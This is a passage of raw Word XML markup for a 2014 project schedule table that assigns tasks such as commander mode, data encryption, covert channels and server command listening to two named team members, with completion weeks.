              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Project Tasks &amp; Responsibilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="000000" w:fill="000000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Date of Completion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="969696" w:fill="969696"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0C0C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0C0C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>David Tran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Preliminary Design Work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 7 (11.03.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Task Assignments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 1 (09.22.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCFFCC" w:fill="CCFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 12 (12.08.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCCCFF" w:fill="CCCCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Client - Commander Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCCCFF" w:fill="CCCCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCCCFF" w:fill="CCCCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Client - Listening Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="CCCCFF" w:fill="CCCCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Client - Data Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Client - Covert Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Testing &amp; Finalizing Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 12 (12.08.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="969696" w:fill="969696"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0C0C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0C0C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cole Rees</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="99CCFF" w:fill="99CCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server - Listen for Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
